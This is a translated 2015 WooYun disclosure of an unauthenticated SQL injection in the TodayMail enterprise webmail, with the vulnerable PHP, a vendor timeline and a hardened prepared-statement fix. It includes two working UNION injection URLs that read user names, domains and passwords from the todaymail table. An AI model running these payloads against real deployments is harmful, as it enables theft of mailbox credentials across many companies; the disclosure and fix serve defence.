Defect ID: WooYun-2015-0125196
Vulnerability title: Unauthenticated SQL injection in TodayMail can easily lead to a mass dump of enterprise mailbox accounts
Related vendor: CNCERT (国家互联网应急中心, National Internet Emergency Center)
Author: xfkxfk
Submitted: 2015-07-09 17:15
Published: 2015-10-08 16:42
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: Handed over to a third-party partner (CNCERT, National Internet Emergency Center) for handling
Tags:
2015-07-09: Details sent to the vendor; awaiting vendor response
2015-07-10: Vendor confirmed; details disclosed to the vendor only
2015-07-13: Details opened to third-party security partners (绿盟科技 NSFOCUS, 唐朝安全巡航, 无声信息)
2015-09-03: Details opened to core white hats and domain experts
2015-09-13: Details opened to regular white hats
2015-09-23: Details opened to intern white hats
2015-10-08: Details disclosed to the public
Unauthenticated SQL injection in TodayMail can easily lead to a mass dump of enterprise mailbox accounts

TodayMail (时代企业邮, "Shidai Enterprise Mail") is described here: http://**.**.**.**/email/**.**.**.**
Searching for the keyword 时代企业邮 turns up a great many deployments, so I will skip the screenshots.

The file searchAddr.inc.php:
```php
<?
header('Content-Type:text/xml;charset=UTF-8');
include_once "../config/dbremote.inc.php";
include_once "../../core/emailcore.class.inc.php";
// No login-check file is included: the endpoint is reachable without a session.
$value=trim($_REQUEST['value']);   // user-controlled search keyword, never sanitized
$tm_id=trim($_REQUEST['ftm_id']);
$EmailCore = new EmailCore($tm_id);
$addrList=$EmailCore->searchAddrAllByKeyword($value);   // $value flows into SQL below
$str="<?xml version=\"1.0\" encoding=\"UTF-8\"?><properties><property>";
$str.="<num>".count($addrList)."</num>";
for($i=0;$i<count($addrList);$i++){
    $str.="<name".$i.">".$addrList[$i]['name']."</name".$i.">";
    $str.="<email".$i.">".$addrList[$i]['email']."</email".$i.">";
}
$str.="</property></properties>";
echo $str;
?>
```
First: notice that no login-verification file is included, so the endpoint can be accessed directly without logging in. Next comes $value=trim($_REQUEST['value']); followed by $addrList=$EmailCore->searchAddrAllByKeyword($value);. Following searchAddrAllByKeyword into emailcore.class.inc.php:
```php
function searchAddrAllByKeyword($value){
    //global $db_remote;
    $addrArray=array();
    // $value is concatenated straight into the LIKE patterns of all three queries.
    $sql="select name,email from address where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";
    $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());
    while($array=mysql_fetch_assoc($rs)){
        $addrArray[]=$array;
    }
    // todaymail also holds tm_passwd; a UNION on this query can read it out.
    $sql="select tm_name as name,tm_domain as email from todaymail where tm_domain='".$this->EmailInfo['tm_domain']."' and (tm_name like '%$value%' or tm_domain like '%$value%') and tm_status in (1,3) and tm_level <> '1' order by tm_name asc";
    // echo $sql;
    $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());
    while($array=mysql_fetch_assoc($rs)){
        $array['email']=$array['name']."@".$array['email'];
        $addrArray[]=$array;
    }
    $sql="select name,email from mailcard where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";
    $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());
    while($array=mysql_fetch_assoc($rs)){
        $addrArray[]=$array;
    }
    return $addrArray;
}
```
It is plain to see that $value goes straight into the SELECT statements without any filtering, which is what produces the SQL injection. Data can be retrieved here without logging in at all. Unfortunately I did not get server access, but the domain names show that a very large number of companies are affected. Take the official site as an example:
http://**.**.**.**//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,%27@@@%27,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
The tm_domain field shows about 4000 domains; after de-duplication there are still more than 3000, which means more than 3000 companies.
Again using the official site as an example:
http://**.**.**.**//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
This reads the usernames, domains and passwords of 1000 users.
A few more examples, picked at random (ten further deployments, same request, hosts redacted).
There are also many databases, so mail contents and the like would leak as well. Given the size of the user base this should count as a high-severity vulnerability; the mail systems of a great many companies would essentially be compromised.

Suggested fix: include the login-verification file, and filter the input.
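One way to implement the fix above, written here as an added example and not TodayMail's own code: the login check runs before anything else, and the three queries from searchAddrAllByKeyword() are rewritten with PDO prepared statements plus LIKE-wildcard escaping. The $pdo handle, the $_SESSION['tm_user'] key and the requireLogin()/likePattern() helpers are assumptions; table and column names follow the page.

```php
<?php
// Added example, not TodayMail's code: hardened replacement for searchAddrAllByKeyword()
// from emailcore.class.inc.php. $pdo and the session key are assumptions; table and
// column names are the ones shown in the vulnerable code.

// Fix 1: the endpoint skipped the login check, so enforce one before any query runs.
function requireLogin(): void
{
    session_start();
    if (empty($_SESSION['tm_user'])) {            // session key is assumed
        http_response_code(401);
        exit('login required');
    }
}

// Fix 2: the keyword becomes a bound parameter and its LIKE wildcards are escaped,
// so neither a quote nor a stray '%' / '_' can change what the query means.
function likePattern(string $value): string
{
    return '%' . addcslashes($value, '\\%_') . '%';   // MySQL's default LIKE escape is '\'
}

function searchAddrAllByKeyword(PDO $pdo, int $tmId, string $tmDomain, string $value): array
{
    $p   = likePattern($value);
    $out = [];

    $q = $pdo->prepare('SELECT name, email FROM address
                        WHERE ftm_id = :tm AND (name LIKE :p1 OR email LIKE :p2)');
    $q->execute([':tm' => $tmId, ':p1' => $p, ':p2' => $p]);
    $out = array_merge($out, $q->fetchAll(PDO::FETCH_ASSOC));

    // Only name and domain are selected; tm_passwd never leaves the database here.
    $q = $pdo->prepare("SELECT tm_name AS name, tm_domain AS email FROM todaymail
                        WHERE tm_domain = :dom AND (tm_name LIKE :p1 OR tm_domain LIKE :p2)
                          AND tm_status IN (1, 3) AND tm_level <> '1' ORDER BY tm_name ASC");
    $q->execute([':dom' => $tmDomain, ':p1' => $p, ':p2' => $p]);
    foreach ($q->fetchAll(PDO::FETCH_ASSOC) as $row) {
        $row['email'] = $row['name'] . '@' . $row['email'];
        $out[] = $row;
    }

    $q = $pdo->prepare('SELECT name, email FROM mailcard
                        WHERE ftm_id = :tm AND (name LIKE :p1 OR email LIKE :p2)');
    $q->execute([':tm' => $tmId, ':p1' => $p, ':p2' => $p]);
    return array_merge($out, $q->fetchAll(PDO::FETCH_ASSOC));
}
```

The calling script (searchAddr.inc.php) should invoke requireLogin() before reading $_REQUEST, and pass ftm_id through (int) casting so the tenant id is validated as well.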
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-07-10 16:40
CNVD has confirmed and reproduced the described issue and has notified the website's operating unit (the software vendor) through the contact details published on the site (or via a previously established handling channel).
None at present